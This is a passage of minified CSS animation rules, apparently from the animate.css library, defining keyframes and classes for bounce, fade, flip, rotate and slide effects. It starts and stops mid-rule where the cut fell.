bounceInUp{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}60%{opacity:1;-webkit-transform:translateY(-30px);-ms-transform:translateY(-30px);transform:translateY(-30px)}80%{-webkit-transform:translateY(10px);-ms-transform:translateY(10px);transform:translateY(10px)}100%{-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}.bounceInUp{-webkit-animation-name:bounceInUp;animation-name:bounceInUp}@-webkit-keyframes bounceOut{0%{-webkit-transform:scale(1);transform:scale(1)}25%{-webkit-transform:scale(.95);transform:scale(.95)}50%{opacity:1;-webkit-transform:scale(1.1);transform:scale(1.1)}100%{opacity:0;-webkit-transform:scale(.3);transform:scale(.3)}}@keyframes bounceOut{0%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}25%{-webkit-transform:scale(.95);-ms-transform:scale(.95);transform:scale(.95)}50%{opacity:1;-webkit-transform:scale(1.1);-ms-transform:scale(1.1);transform:scale(1.1)}100%{opacity:0;-webkit-transform:scale(.3);-ms-transform:scale(.3);transform:scale(.3)}}.bounceOut{-webkit-animation-name:bounceOut;animation-name:bounceOut}@-webkit-keyframes bounceOutDown{0%{-webkit-transform:translateY(0);transform:translateY(0)}20%{opacity:1;-webkit-transform:translateY(-20px);transform:translateY(-20px)}100%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}}@keyframes bounceOutDown{0%{-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}20%{opacity:1;-webkit-transform:translateY(-20px);-ms-transform:translateY(-20px);transform:translateY(-20px)}100%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}}.bounceOutDown{-webkit-animation-name:bounceOutDown;animation-name:bounceOutDown}@-webkit-keyframes bounceOutLeft{0%{-webkit-transform:translateX(0);transform:translateX(0)}20%{opacity:1;-webkit-transform:translateX(20px);transform:translateX(20px)}100%{opacity:0;-webkit-transform:translateX(-2000px);transform:translateX(-2000px)}}@keyframes bounceOutLeft{0%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}20%{opacity:1;-webkit-transform:translateX(20px);-ms-transform:translateX(20px);transform:translateX(20px)}100%{opacity:0;-webkit-transform:translateX(-2000px);-ms-transform:translateX(-2000px);transform:translateX(-2000px)}}.bounceOutLeft{-webkit-animation-name:bounceOutLeft;animation-name:bounceOutLeft}@-webkit-keyframes bounceOutRight{0%{-webkit-transform:translateX(0);transform:translateX(0)}20%{opacity:1;-webkit-transform:translateX(-20px);transform:translateX(-20px)}100%{opacity:0;-webkit-transform:translateX(2000px);transform:translateX(2000px)}}@keyframes bounceOutRight{0%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}20%{opacity:1;-webkit-transform:translateX(-20px);-ms-transform:translateX(-20px);transform:translateX(-20px)}100%{opacity:0;-webkit-transform:translateX(2000px);-ms-transform:translateX(2000px);transform:translateX(2000px)}}.bounceOutRight{-webkit-animation-name:bounceOutRight;animation-name:bounceOutRight}@-webkit-keyframes bounceOutUp{0%{-webkit-transform:translateY(0);transform:translateY(0)}20%{opacity:1;-webkit-transform:translateY(20px);transform:translateY(20px)}100%{opacity:0;-webkit-transform:translateY(-2000px);transform:translateY(-2000px)}}@keyframes bounceOutUp{0%{-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}20%{opacity:1;-webkit-transform:translateY(20px);-ms-transform:translateY(20px);transform:translateY(20px)}100%{opacity:0;-webkit-transform:translateY(-2000px);-ms-transform:translateY(-2000px);transform:translateY(-2000px)}}.bounceOutUp{-webkit-animation-name:bounceOutUp;animation-name:bounceOutUp}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}.fadeIn{-webkit-animation-name:fadeIn;animation-name:fadeIn}@-webkit-keyframes fadeInDown{0%{opacity:0;-webkit-transform:translateY(-20px);transform:translateY(-20px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInDown{0%{opacity:0;-webkit-transform:translateY(-20px);-ms-transform:translateY(-20px);transform:translateY(-20px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}.fadeInDown{-webkit-animation-name:fadeInDown;animation-name:fadeInDown}@-webkit-keyframes fadeInDownBig{0%{opacity:0;-webkit-transform:translateY(-2000px);transform:translateY(-2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInDownBig{0%{opacity:0;-webkit-transform:translateY(-2000px);-ms-transform:translateY(-2000px);transform:translateY(-2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}.fadeInDownBig{-webkit-animation-name:fadeInDownBig;animation-name:fadeInDownBig}@-webkit-keyframes fadeInLeft{0%{opacity:0;-webkit-transform:translateX(-20px);transform:translateX(-20px)}100%{opacity:1;-webkit-transform:translateX(0);transform:translateX(0)}}@keyframes fadeInLeft{0%{opacity:0;-webkit-transform:translateX(-20px);-ms-transform:translateX(-20px);transform:translateX(-20px)}100%{opacity:1;-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}}.fadeInLeft{-webkit-animation-name:fadeInLeft;animation-name:fadeInLeft}@-webkit-keyframes fadeInLeftBig{0%{opacity:0;-webkit-transform:translateX(-2000px);transform:translateX(-2000px)}100%{opacity:1;-webkit-transform:translateX(0);transform:translateX(0)}}@keyframes fadeInLeftBig{0%{opacity:0;-webkit-transform:translateX(-2000px);-ms-transform:translateX(-2000px);transform:translateX(-2000px)}100%{opacity:1;-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}}.fadeInLeftBig{-webkit-animation-name:fadeInLeftBig;animation-name:fadeInLeftBig}@-webkit-keyframes fadeInRight{0%{opacity:0;-webkit-transform:translateX(20px);transform:translateX(20px)}100%{opacity:1;-webkit-transform:translateX(0);transform:translateX(0)}}@keyframes fadeInRight{0%{opacity:0;-webkit-transform:translateX(20px);-ms-transform:translateX(20px);transform:translateX(20px)}100%{opacity:1;-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}}.fadeInRight{-webkit-animation-name:fadeInRight;animation-name:fadeInRight}@-webkit-keyframes fadeInRightBig{0%{opacity:0;-webkit-transform:translateX(2000px);transform:translateX(2000px)}100%{opacity:1;-webkit-transform:translateX(0);transform:translateX(0)}}@keyframes fadeInRightBig{0%{opacity:0;-webkit-transform:translateX(2000px);-ms-transform:translateX(2000px);transform:translateX(2000px)}100%{opacity:1;-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}}.fadeInRightBig{-webkit-animation-name:fadeInRightBig;animation-name:fadeInRightBig}@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translateY(20px);transform:translateY(20px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translateY(20px);-ms-transform:translateY(20px);transform:translateY(20px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}.fadeInUp{-webkit-animation-name:fadeInUp;animation-name:fadeInUp}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}.fadeInUpBig{-webkit-animation-name:fadeInUpBig;animation-name:fadeInUpBig}@-webkit-keyframes fadeOut{0%{opacity:1}100%{opacity:0}}@keyframes fadeOut{0%{opacity:1}100%{opacity:0}}.fadeOut{-webkit-animation-name:fadeOut;animation-name:fadeOut}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}100%{opacity:0;-webkit-transform:translateY(20px);transform:translateY(20px)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}100%{opacity:0;-webkit-transform:translateY(20px);-ms-transform:translateY(20px);transform:translateY(20px)}}.fadeOutDown{-webkit-animation-name:fadeOutDown;animation-name:fadeOutDown}@-webkit-keyframes fadeOutDownBig{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}100%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}}@keyframes fadeOutDownBig{0%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}100%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}}.fadeOutDownBig{-webkit-animation-name:fadeOutDownBig;animation-name:fadeOutDownBig}@-webkit-keyframes fadeOutLeft{0%{opacity:1;-webkit-transform:translateX(0);transform:translateX(0)}100%{opacity:0;-webkit-transform:translateX(-20px);transform:translateX(-20px)}}@keyframes fadeOutLeft{0%{opacity:1;-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}100%{opacity:0;-webkit-transform:translateX(-20px);-ms-transform:translateX(-20px);transform:translateX(-20px)}}.fadeOutLeft{-webkit-animation-name:fadeOutLeft;animation-name:fadeOutLeft}@-webkit-keyframes fadeOutLeftBig{0%{opacity:1;-webkit-transform:translateX(0);transform:translateX(0)}100%{opacity:0;-webkit-transform:translateX(-2000px);transform:translateX(-2000px)}}@keyframes fadeOutLeftBig{0%{opacity:1;-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}100%{opacity:0;-webkit-transform:translateX(-2000px);-ms-transform:translateX(-2000px);transform:translateX(-2000px)}}.fadeOutLeftBig{-webkit-animation-name:fadeOutLeftBig;animation-name:fadeOutLeftBig}@-webkit-keyframes fadeOutRight{0%{opacity:1;-webkit-transform:translateX(0);transform:translateX(0)}100%{opacity:0;-webkit-transform:translateX(20px);transform:translateX(20px)}}@keyframes fadeOutRight{0%{opacity:1;-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}100%{opacity:0;-webkit-transform:translateX(20px);-ms-transform:translateX(20px);transform:translateX(20px)}}.fadeOutRight{-webkit-animation-name:fadeOutRight;animation-name:fadeOutRight}@-webkit-keyframes fadeOutRightBig{0%{opacity:1;-webkit-transform:translateX(0);transform:translateX(0)}100%{opacity:0;-webkit-transform:translateX(2000px);transform:translateX(2000px)}}@keyframes fadeOutRightBig{0%{opacity:1;-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}100%{opacity:0;-webkit-transform:translateX(2000px);-ms-transform:translateX(2000px);transform:translateX(2000px)}}.fadeOutRightBig{-webkit-animation-name:fadeOutRightBig;animation-name:fadeOutRightBig}@-webkit-keyframes fadeOutUp{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}100%{opacity:0;-webkit-transform:translateY(-20px);transform:translateY(-20px)}}@keyframes fadeOutUp{0%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}100%{opacity:0;-webkit-transform:translateY(-20px);-ms-transform:translateY(-20px);transform:translateY(-20px)}}.fadeOutUp{-webkit-animation-name:fadeOutUp;animation-name:fadeOutUp}@-webkit-keyframes fadeOutUpBig{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}100%{opacity:0;-webkit-transform:translateY(-2000px);transform:translateY(-2000px)}}@keyframes fadeOutUpBig{0%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}100%{opacity:0;-webkit-transform:translateY(-2000px);-ms-transform:translateY(-2000px);transform:translateY(-2000px)}}.fadeOutUpBig{-webkit-animation-name:fadeOutUpBig;animation-name:fadeOutUpBig}@-webkit-keyframes flip{0%{-webkit-transform:perspective(400px) translateZ(0) rotateY(0) scale(1);transform:perspective(400px) translateZ(0) rotateY(0) scale(1);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}40%{-webkit-transform:perspective(400px) translateZ(150px) rotateY(170deg) scale(1);transform:perspective(400px) translateZ(150px) rotateY(170deg) scale(1);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}50%{-webkit-transform:perspective(400px) translateZ(150px) rotateY(190deg) scale(1);transform:perspective(400px) translateZ(150px) rotateY(190deg) scale(1);-webkit-animation-timing-function:ease-in;animation-timing-function:ease-in}80%{-webkit-transform:perspective(400px) translateZ(0) rotateY(360deg) scale(.95);transform:perspective(400px) translateZ(0) rotateY(360deg) scale(.95);-webkit-animation-timing-function:ease-in;animation-timing-function:ease-in}100%{-webkit-transform:perspective(400px) translateZ(0) rotateY(360deg) scale(1);transform:perspective(400px) translateZ(0) rotateY(360deg) scale(1);-webkit-animation-timing-function:ease-in;animation-timing-function:ease-in}}@keyframes flip{0%{-webkit-transform:perspective(400px) translateZ(0) rotateY(0) scale(1);-ms-transform:perspective(400px) translateZ(0) rotateY(0) scale(1);transform:perspective(400px) translateZ(0) rotateY(0) scale(1);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}40%{-webkit-transform:perspective(400px) translateZ(150px) rotateY(170deg) scale(1);-ms-transform:perspective(400px) translateZ(150px) rotateY(170deg) scale(1);transform:perspective(400px) translateZ(150px) rotateY(170deg) scale(1);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}50%{-webkit-transform:perspective(400px) translateZ(150px) rotateY(190deg) scale(1);-ms-transform:perspective(400px) translateZ(150px) rotateY(190deg) scale(1);transform:perspective(400px) translateZ(150px) rotateY(190deg) scale(1);-webkit-animation-timing-function:ease-in;animation-timing-function:ease-in}80%{-webkit-transform:perspective(400px) translateZ(0) rotateY(360deg) scale(.95);-ms-transform:perspective(400px) translateZ(0) rotateY(360deg) scale(.95);transform:perspective(400px) translateZ(0) rotateY(360deg) scale(.95);-webkit-animation-timing-function:ease-in;animation-timing-function:ease-in}100%{-webkit-transform:perspective(400px) translateZ(0) rotateY(360deg) scale(1);-ms-transform:perspective(400px) translateZ(0) rotateY(360deg) scale(1);transform:perspective(400px) translateZ(0) rotateY(360deg) scale(1);-webkit-animation-timing-function:ease-in;animation-timing-function:ease-in}}.animated.flip{-webkit-backface-visibility:visible;-ms-backface-visibility:visible;backface-visibility:visible;-webkit-animation-name:flip;animation-name:flip}@-webkit-keyframes flipInX{0%{-webkit-transform:perspective(400px) rotateX(90deg);transform:perspective(400px) rotateX(90deg);opacity:0}40%{-webkit-transform:perspective(400px) rotateX(-10deg);transform:perspective(400px) rotateX(-10deg)}70%{-webkit-transform:perspective(400px) rotateX(10deg);transform:perspective(400px) rotateX(10deg)}100%{-webkit-transform:perspective(400px) rotateX(0deg);transform:perspective(400px) rotateX(0deg);opacity:1}}@keyframes flipInX{0%{-webkit-transform:perspective(400px) rotateX(90deg);-ms-transform:perspective(400px) rotateX(90deg);transform:perspective(400px) rotateX(90deg);opacity:0}40%{-webkit-transform:perspective(400px) rotateX(-10deg);-ms-transform:perspective(400px) rotateX(-10deg);transform:perspective(400px) rotateX(-10deg)}70%{-webkit-transform:perspective(400px) rotateX(10deg);-ms-transform:perspective(400px) rotateX(10deg);transform:perspective(400px) rotateX(10deg)}100%{-webkit-transform:perspective(400px) rotateX(0deg);-ms-transform:perspective(400px) rotateX(0deg);transform:perspective(400px) rotateX(0deg);opacity:1}}.flipInX{-webkit-backface-visibility:visible!important;-ms-backface-visibility:visible!important;backface-visibility:visible!important;-webkit-animation-name:flipInX;animation-name:flipInX}@-webkit-keyframes flipInY{0%{-webkit-transform:perspective(400px) rotateY(90deg);transform:perspective(400px) rotateY(90deg);opacity:0}40%{-webkit-transform:perspective(400px) rotateY(-10deg);transform:perspective(400px) rotateY(-10deg)}70%{-webkit-transform:perspective(400px) rotateY(10deg);transform:perspective(400px) rotateY(10deg)}100%{-webkit-transform:perspective(400px) rotateY(0deg);transform:perspective(400px) rotateY(0deg);opacity:1}}@keyframes flipInY{0%{-webkit-transform:perspective(400px) rotateY(90deg);-ms-transform:perspective(400px) rotateY(90deg);transform:perspective(400px) rotateY(90deg);opacity:0}40%{-webkit-transform:perspective(400px) rotateY(-10deg);-ms-transform:perspective(400px) rotateY(-10deg);transform:perspective(400px) rotateY(-10deg)}70%{-webkit-transform:perspective(400px) rotateY(10deg);-ms-transform:perspective(400px) rotateY(10deg);transform:perspective(400px) rotateY(10deg)}100%{-webkit-transform:perspective(400px) rotateY(0deg);-ms-transform:perspective(400px) rotateY(0deg);transform:perspective(400px) rotateY(0deg);opacity:1}}.flipInY{-webkit-backface-visibility:visible!important;-ms-backface-visibility:visible!important;backface-visibility:visible!important;-webkit-animation-name:flipInY;animation-name:flipInY}@-webkit-keyframes flipOutX{0%{-webkit-transform:perspective(400px) rotateX(0deg);transform:perspective(400px) rotateX(0deg);opacity:1}100%{-webkit-transform:perspective(400px) rotateX(90deg);transform:perspective(400px) rotateX(90deg);opacity:0}}@keyframes flipOutX{0%{-webkit-transform:perspective(400px) rotateX(0deg);-ms-transform:perspective(400px) rotateX(0deg);transform:perspective(400px) rotateX(0deg);opacity:1}100%{-webkit-transform:perspective(400px) rotateX(90deg);-ms-transform:perspective(400px) rotateX(90deg);transform:perspective(400px) rotateX(90deg);opacity:0}}.flipOutX{-webkit-animation-name:flipOutX;animation-name:flipOutX;-webkit-backface-visibility:visible!important;-ms-backface-visibility:visible!important;backface-visibility:visible!important}@-webkit-keyframes flipOutY{0%{-webkit-transform:perspective(400px) rotateY(0deg);transform:perspective(400px) rotateY(0deg);opacity:1}100%{-webkit-transform:perspective(400px) rotateY(90deg);transform:perspective(400px) rotateY(90deg);opacity:0}}@keyframes flipOutY{0%{-webkit-transform:perspective(400px) rotateY(0deg);-ms-transform:perspective(400px) rotateY(0deg);transform:perspective(400px) rotateY(0deg);opacity:1}100%{-webkit-transform:perspective(400px) rotateY(90deg);-ms-transform:perspective(400px) rotateY(90deg);transform:perspective(400px) rotateY(90deg);opacity:0}}.flipOutY{-webkit-backface-visibility:visible!important;-ms-backface-visibility:visible!important;backface-visibility:visible!important;-webkit-animation-name:flipOutY;animation-name:flipOutY}@-webkit-keyframes lightSpeedIn{0%{-webkit-transform:translateX(100%) skewX(-30deg);transform:translateX(100%) skewX(-30deg);opacity:0}60%{-webkit-transform:translateX(-20%) skewX(30deg);transform:translateX(-20%) skewX(30deg);opacity:1}80%{-webkit-transform:translateX(0%) skewX(-15deg);transform:translateX(0%) skewX(-15deg);opacity:1}100%{-webkit-transform:translateX(0%) skewX(0deg);transform:translateX(0%) skewX(0deg);opacity:1}}@keyframes lightSpeedIn{0%{-webkit-transform:translateX(100%) skewX(-30deg);-ms-transform:translateX(100%) skewX(-30deg);transform:translateX(100%) skewX(-30deg);opacity:0}60%{-webkit-transform:translateX(-20%) skewX(30deg);-ms-transform:translateX(-20%) skewX(30deg);transform:translateX(-20%) skewX(30deg);opacity:1}80%{-webkit-transform:translateX(0%) skewX(-15deg);-ms-transform:translateX(0%) skewX(-15deg);transform:translateX(0%) skewX(-15deg);opacity:1}100%{-webkit-transform:translateX(0%) skewX(0deg);-ms-transform:translateX(0%) skewX(0deg);transform:translateX(0%) skewX(0deg);opacity:1}}.lightSpeedIn{-webkit-animation-name:lightSpeedIn;animation-name:lightSpeedIn;-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}@-webkit-keyframes lightSpeedOut{0%{-webkit-transform:translateX(0%) skewX(0deg);transform:translateX(0%) skewX(0deg);opacity:1}100%{-webkit-transform:translateX(100%) skewX(-30deg);transform:translateX(100%) skewX(-30deg);opacity:0}}@keyframes lightSpeedOut{0%{-webkit-transform:translateX(0%) skewX(0deg);-ms-transform:translateX(0%) skewX(0deg);transform:translateX(0%) skewX(0deg);opacity:1}100%{-webkit-transform:translateX(100%) skewX(-30deg);-ms-transform:translateX(100%) skewX(-30deg);transform:translateX(100%) skewX(-30deg);opacity:0}}.lightSpeedOut{-webkit-animation-name:lightSpeedOut;animation-name:lightSpeedOut;-webkit-animation-timing-function:ease-in;animation-timing-function:ease-in}@-webkit-keyframes rotateIn{0%{-webkit-transform-origin:center center;transform-origin:center center;-webkit-transform:rotate(-200deg);transform:rotate(-200deg);opacity:0}100%{-webkit-transform-origin:center center;transform-origin:center center;-webkit-transform:rotate(0);transform:rotate(0);opacity:1}}@keyframes rotateIn{0%{-webkit-transform-origin:center center;-ms-transform-origin:center center;transform-origin:center center;-webkit-transform:rotate(-200deg);-ms-transform:rotate(-200deg);transform:rotate(-200deg);opacity:0}100%{-webkit-transform-origin:center center;-ms-transform-origin:center center;transform-origin:center center;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);opacity:1}}.rotateIn{-webkit-animation-name:rotateIn;animation-name:rotateIn}@-webkit-keyframes rotateInDownLeft{0%{-webkit-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(-90deg);transform:rotate(-90deg);opacity:0}100%{-webkit-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(0);transform:rotate(0);opacity:1}}@keyframes rotateInDownLeft{0%{-webkit-transform-origin:left bottom;-ms-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(-90deg);-ms-transform:rotate(-90deg);transform:rotate(-90deg);opacity:0}100%{-webkit-transform-origin:left bottom;-ms-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);opacity:1}}.rotateInDownLeft{-webkit-animation-name:rotateInDownLeft;animation-name:rotateInDownLeft}@-webkit-keyframes rotateInDownRight{0%{-webkit-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(90deg);transform:rotate(90deg);opacity:0}100%{-webkit-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(0);transform:rotate(0);opacity:1}}@keyframes rotateInDownRight{0%{-webkit-transform-origin:right bottom;-ms-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);opacity:0}100%{-webkit-transform-origin:right bottom;-ms-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);opacity:1}}.rotateInDownRight{-webkit-animation-name:rotateInDownRight;animation-name:rotateInDownRight}@-webkit-keyframes rotateInUpLeft{0%{-webkit-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(90deg);transform:rotate(90deg);opacity:0}100%{-webkit-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(0);transform:rotate(0);opacity:1}}@keyframes rotateInUpLeft{0%{-webkit-transform-origin:left bottom;-ms-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);opacity:0}100%{-webkit-transform-origin:left bottom;-ms-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);opacity:1}}.rotateInUpLeft{-webkit-animation-name:rotateInUpLeft;animation-name:rotateInUpLeft}@-webkit-keyframes rotateInUpRight{0%{-webkit-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(-90deg);transform:rotate(-90deg);opacity:0}100%{-webkit-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(0);transform:rotate(0);opacity:1}}@keyframes rotateInUpRight{0%{-webkit-transform-origin:right bottom;-ms-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(-90deg);-ms-transform:rotate(-90deg);transform:rotate(-90deg);opacity:0}100%{-webkit-transform-origin:right bottom;-ms-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);opacity:1}}.rotateInUpRight{-webkit-animation-name:rotateInUpRight;animation-name:rotateInUpRight}@-webkit-keyframes rotateOut{0%{-webkit-transform-origin:center center;transform-origin:center center;-webkit-transform:rotate(0);transform:rotate(0);opacity:1}100%{-webkit-transform-origin:center center;transform-origin:center center;-webkit-transform:rotate(200deg);transform:rotate(200deg);opacity:0}}@keyframes rotateOut{0%{-webkit-transform-origin:center center;-ms-transform-origin:center center;transform-origin:center center;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);opacity:1}100%{-webkit-transform-origin:center center;-ms-transform-origin:center center;transform-origin:center center;-webkit-transform:rotate(200deg);-ms-transform:rotate(200deg);transform:rotate(200deg);opacity:0}}.rotateOut{-webkit-animation-name:rotateOut;animation-name:rotateOut}@-webkit-keyframes rotateOutDownLeft{0%{-webkit-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(0);transform:rotate(0);opacity:1}100%{-webkit-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(90deg);transform:rotate(90deg);opacity:0}}@keyframes rotateOutDownLeft{0%{-webkit-transform-origin:left bottom;-ms-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);opacity:1}100%{-webkit-transform-origin:left bottom;-ms-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);opacity:0}}.rotateOutDownLeft{-webkit-animation-name:rotateOutDownLeft;animation-name:rotateOutDownLeft}@-webkit-keyframes rotateOutDownRight{0%{-webkit-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(0);transform:rotate(0);opacity:1}100%{-webkit-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(-90deg);transform:rotate(-90deg);opacity:0}}@keyframes rotateOutDownRight{0%{-webkit-transform-origin:right bottom;-ms-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);opacity:1}100%{-webkit-transform-origin:right bottom;-ms-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(-90deg);-ms-transform:rotate(-90deg);transform:rotate(-90deg);opacity:0}}.rotateOutDownRight{-webkit-animation-name:rotateOutDownRight;animation-name:rotateOutDownRight}@-webkit-keyframes rotateOutUpLeft{0%{-webkit-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(0);transform:rotate(0);opacity:1}100%{-webkit-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(-90deg);transform:rotate(-90deg);opacity:0}}@keyframes rotateOutUpLeft{0%{-webkit-transform-origin:left bottom;-ms-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);opacity:1}100%{-webkit-transform-origin:left bottom;-ms-transform-origin:left bottom;transform-origin:left bottom;-webkit-transform:rotate(-90deg);-ms-transform:rotate(-90deg);transform:rotate(-90deg);opacity:0}}.rotateOutUpLeft{-webkit-animation-name:rotateOutUpLeft;animation-name:rotateOutUpLeft}@-webkit-keyframes rotateOutUpRight{0%{-webkit-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(0);transform:rotate(0);opacity:1}100%{-webkit-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(90deg);transform:rotate(90deg);opacity:0}}@keyframes rotateOutUpRight{0%{-webkit-transform-origin:right bottom;-ms-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);opacity:1}100%{-webkit-transform-origin:right bottom;-ms-transform-origin:right bottom;transform-origin:right bottom;-webkit-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);opacity:0}}.rotateOutUpRight{-webkit-animation-name:rotateOutUpRight;animation-name:rotateOutUpRight}@-webkit-keyframes slideInDown{0%{opacity:0;-webkit-transform:translateY(-2000px);transform:translateY(-2000px)}100%{-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes slideInDown{0%{opacity:0;-webkit-transform:translateY(-2000px);-ms-transform:translateY(-2000px);transform:translateY(-2000px)}100%{-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}.slideInDown{-webkit-animation-name:slideInDown;animation-name:slideInDown}@-webkit-keyframes slideInLeft{0%{opacity:0;-webkit-transform:translateX(-2000px);transform:translateX(-2000px)}100%{-webkit-transform:translateX(0);transform:translateX(0)}}@keyframes slideInLeft{0%{opacity:0;-webkit-transform:translateX(-2000px);-ms-transform:translateX(-2000px);transform:translateX(-2000px)}100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}}.slideInLeft{-webkit-animation-name:slideInLeft;animation-name:slideInLeft}@-webkit-keyframes slideInRight{0%{opacity:0;-webkit-transform:translateX(2000px);transform:translateX(2000px)}100%{-webkit-transform:translateX(0);transform:translateX(0)}}@keyframes slideInRight{0%{opacity:0;-webkit-transform:translateX(2000px);-ms-transform:translateX(2000px);transform:translateX(2000px)}100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}}.slideInRight{-webkit-animation-name:slideInRight;animation-name:slideInRight}@-webkit-keyframes slideOutLeft{0%{-webkit-transform:translateX(0);transform:translateX(0)}100%{opacity:0;-webkit-transform:translateX(-2000px);transform:translateX(-2000px)}}@keyframes slideOutLeft{0%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}100%{opacity:0;-webkit-transform:translateX(-2000px);-ms-transform:translateX(-2000px);transform:translateX(-2000px)}}.slideOutLeft{-webkit-animation-name:slideOutLeft;animation-name:slideOutLeft}@-webkit-keyframes slideOutRight{0%{-webkit-transform:translateX(0);transform:translateX(0)}100%{opacity:0;-webkit-transform:translateX(2000px);transform:translateX(2000px)}}@keyframes 